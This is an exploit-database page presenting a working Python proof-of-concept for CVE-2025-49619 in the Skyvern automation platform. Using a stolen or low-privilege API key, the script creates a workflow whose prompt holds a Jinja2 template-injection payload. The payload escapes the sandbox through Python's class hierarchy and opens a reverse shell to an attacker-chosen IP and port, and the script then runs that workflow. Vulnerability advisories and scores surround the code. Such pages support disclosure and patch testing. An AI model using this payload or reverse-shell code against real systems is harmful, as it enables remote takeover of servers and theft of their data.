Vulners
Lucene search
Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Exploit for CVE-2025-49619 | 9 Jun 202510:09 | – | githubexploit |
 | CVE-2025-49619 | 7 Jun 202514:30 | – | circl |
 | Ikonomos Skyvern 安全漏洞 | 7 Jun 202500:00 | – | cnnvd |
 | CVE-2025-49619 | 7 Jun 202500:00 | – | cve |
 | CVE-2025-49619 | 7 Jun 202500:00 | – | cvelist |
 | Skyvern has a Jinja runtime leak | 7 Jun 202515:30 | – | github |
 | Skyvern SSTI Remote Code Execution | 29 Jun 202518:53 | – | metasploit |
 | CVE-2025-49619 | 7 Jun 202514:15 | – | nvd |
 | CVE-2025-49619 | 7 Jun 202514:15 | – | osv |
| GHSA-H92G-3XC3-WW2R Skyvern has a Jinja runtime leak | 7 Jun 202515:30 | – | osv |
10
# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
# Date: 2025-06-15
# Exploit Author: Cristian Branet
# Vendor Homepage: https://www.skyvern.com/
# Software Link: https://github.com/Skyvern-AI/skyvern
# Version: < 0.1.85, before commit db856cd
# Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04)
# CVE : CVE-2025-49619
# Article: https://cristibtz.github.io/posts/CVE-2025-49619/
'''
Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax.
An attacker with low privileges can inject a malicious payload in a block that contains Prompt section,
which gets rendered server-side, resulting in blind remote code execution via curl.
'''
import requests, argparse, pyfiglet
parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)")
parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key")
parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection")
parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection")
def create_exploit_workflow(url, ip, port, x_api_key):
exploit_workflow = {
"title": "Exploit",
"description": "",
"proxy_location": "RESIDENTIAL",
"webhook_callback_url": "",
"persist_browser_session": False,
"model": None,
"totp_verification_url": None,
"workflow_definition": {
"parameters": [],
"blocks": [
{
"label": "block_1",
"continue_on_failure": False,
"block_type": "task_v2",
"prompt": (
"{% for x in ().__class__.__base__.__subclasses__() %}\n"
" {% if 'warning' in x.__name__ %}\n"
" {{ x()._module.__builtins__['__import__']('os').popen(\n"
" \"python3 -c 'import socket,os,pty;\"\n"
" \"s=socket.socket();\"\n"
f" \'s.connect((\\\"{ip}\\\",{port}));\'\n"
" \"os.dup2(s.fileno(),0);\"\n"
" \"os.dup2(s.fileno(),1);\"\n"
" \"os.dup2(s.fileno(),2);\"\n"
" \"pty.spawn(\\\"sh\\\")'\"\n"
" ).read() }}\n"
" {% endif %}\n"
"{% endfor %}"
),
"url": "",
"max_steps": 25,
"totp_identifier": None,
"totp_verification_url": None
}
]
},
"is_saved_task": False
}
headers = {
"Content-Type": "application/json",
"X-API-Key": x_api_key
}
response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers)
if response.status_code == 200:
print("[+] Exploit workflow created successfully!")
else:
print("[-] Failed to create exploit workflow:", response.text)
return None
workflow_permanent_id = response.json().get("workflow_permanent_id")
print(f"[+] Workflow Permanent ID: {workflow_permanent_id}")
return workflow_permanent_id
def run_exploit_workflow(url, x_api_key, workflow_permanent_id):
workflow_data = {
"workflow_id": workflow_permanent_id
}
headers = {
"Content-Type": "application/json",
"X-API-Key": x_api_key
}
response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers)
if response.status_code == 200:
print("[+] Exploit workflow executed successfully!")
else:
print("[-] Failed to execute exploit workflow:", response.text)
if __name__=="__main__":
print("\n")
print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100))
print("Author: Cristian Branet")
print("GitHub: github.com/cristibtz")
print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.")
print("\n")
args = parser.parse_args()
url = args.url
x_api_key = args.x_api_key
ip = args.ip
port = args.port
workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key)
run_exploit_workflow(url, x_api_key, workflow_permanent_id)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jun 2025 00:00Current
8.5High risk
Vulners AI Score8.5
CVSS 3.18.5
EPSS0.73541
SSVC